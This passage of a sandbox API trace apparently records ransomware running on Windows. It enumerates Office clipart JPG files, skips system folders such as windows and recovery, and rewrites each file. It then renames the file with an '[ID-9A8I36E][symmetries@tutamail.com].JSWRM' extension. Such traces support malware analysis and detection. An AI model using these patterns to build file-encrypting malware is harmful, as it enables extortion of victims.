office\\root\\clipart\\pub60cor\\j0309567.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.282] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21580) returned 1 [0089.282] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5440) returned 0x24d210 [0089.282] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5440, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5440, lpOverlapped=0x0) returned 1 [0089.286] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.286] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5440, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5440, lpOverlapped=0x0) returned 1 [0089.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.286] CloseHandle (hObject=0x314) returned 1 [0089.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0089.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0089.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0089.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0089.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0089.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0089.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.287] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309567.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309567.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309567.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309567.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0089.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0089.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.288] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf406dcf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9a8b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0309585.JPG", cAlternateFileName="")) returned 1 [0089.288] lstrcmpiW (lpString1="J0309585.JPG", lpString2=".") returned 1 [0089.288] lstrcmpiW (lpString1="J0309585.JPG", lpString2="..") returned 1 [0089.288] lstrcmpiW (lpString1="J0309585.JPG", lpString2="...") returned 1 [0089.288] lstrcmpiW (lpString1="J0309585.JPG", lpString2="windows") returned -1 [0089.288] lstrcmpiW (lpString1="J0309585.JPG", lpString2="recovery") returned -1 [0089.288] lstrcmpiW (lpString1="J0309585.JPG", lpString2="perflogs") returned -1 [0089.288] lstrcmpiW (lpString1="J0309585.JPG", lpString2="documents and settings") returned 1 [0089.288] lstrcmpiW (lpString1="J0309585.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.288] lstrcmpiW (lpString1="J0309585.JPG", lpString2="system volume information") returned -1 [0089.288] lstrcmpiW (lpString1="J0309585.JPG", lpString2="msocache") returned -1 [0089.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0089.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309585.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309585.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309585.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0089.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0089.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309585.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309585.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309585.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0089.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0089.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309585.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309585.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.290] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=39563) returned 1 [0089.290] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9a80) returned 0x24d210 [0089.290] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9a80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9a80, lpOverlapped=0x0) returned 1 [0089.294] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.294] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9a80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9a80, lpOverlapped=0x0) returned 1 [0089.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.295] CloseHandle (hObject=0x314) returned 1 [0089.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0089.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0089.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0089.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0089.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0089.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.296] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309585.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309585.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309585.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309585.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0089.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.297] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf406dcf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf406dcf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x81f0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0309598.JPG", cAlternateFileName="")) returned 1 [0089.297] lstrcmpiW (lpString1="J0309598.JPG", lpString2=".") returned 1 [0089.297] lstrcmpiW (lpString1="J0309598.JPG", lpString2="..") returned 1 [0089.297] lstrcmpiW (lpString1="J0309598.JPG", lpString2="...") returned 1 [0089.297] lstrcmpiW (lpString1="J0309598.JPG", lpString2="windows") returned -1 [0089.297] lstrcmpiW (lpString1="J0309598.JPG", lpString2="recovery") returned -1 [0089.297] lstrcmpiW (lpString1="J0309598.JPG", lpString2="perflogs") returned -1 [0089.297] lstrcmpiW (lpString1="J0309598.JPG", lpString2="documents and settings") returned 1 [0089.297] lstrcmpiW (lpString1="J0309598.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.297] lstrcmpiW (lpString1="J0309598.JPG", lpString2="system volume information") returned -1 [0089.297] lstrcmpiW (lpString1="J0309598.JPG", lpString2="msocache") returned -1 [0089.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309598.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309598.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309598.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309598.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309598.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309598.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0089.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0089.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309598.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309598.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.298] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33264) returned 1 [0089.298] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x81f0) returned 0x24d210 [0089.299] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x81f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x81f0, lpOverlapped=0x0) returned 1 [0089.304] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.304] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x81f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x81f0, lpOverlapped=0x0) returned 1 [0089.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.305] CloseHandle (hObject=0x314) returned 1 [0089.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0089.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0089.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0089.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0089.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0089.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.305] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309598.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309598.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309598.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309598.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0089.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0089.306] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf406dcf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf406dcf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaabb, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0309664.JPG", cAlternateFileName="")) returned 1 [0089.306] lstrcmpiW (lpString1="J0309664.JPG", lpString2=".") returned 1 [0089.306] lstrcmpiW (lpString1="J0309664.JPG", lpString2="..") returned 1 [0089.306] lstrcmpiW (lpString1="J0309664.JPG", lpString2="...") returned 1 [0089.306] lstrcmpiW (lpString1="J0309664.JPG", lpString2="windows") returned -1 [0089.306] lstrcmpiW (lpString1="J0309664.JPG", lpString2="recovery") returned -1 [0089.306] lstrcmpiW (lpString1="J0309664.JPG", lpString2="perflogs") returned -1 [0089.306] lstrcmpiW (lpString1="J0309664.JPG", lpString2="documents and settings") returned 1 [0089.306] lstrcmpiW (lpString1="J0309664.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.306] lstrcmpiW (lpString1="J0309664.JPG", lpString2="system volume information") returned -1 [0089.306] lstrcmpiW (lpString1="J0309664.JPG", lpString2="msocache") returned -1 [0089.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0089.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309664.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309664.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309664.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0089.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309664.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309664.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309664.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0089.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0089.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0089.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309664.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309664.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.308] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=43707) returned 1 [0089.308] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaab0) returned 0x24d210 [0089.309] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xaab0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xaab0, lpOverlapped=0x0) returned 1 [0089.313] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.313] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xaab0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xaab0, lpOverlapped=0x0) returned 1 [0089.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.332] CloseHandle (hObject=0x314) returned 1 [0089.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 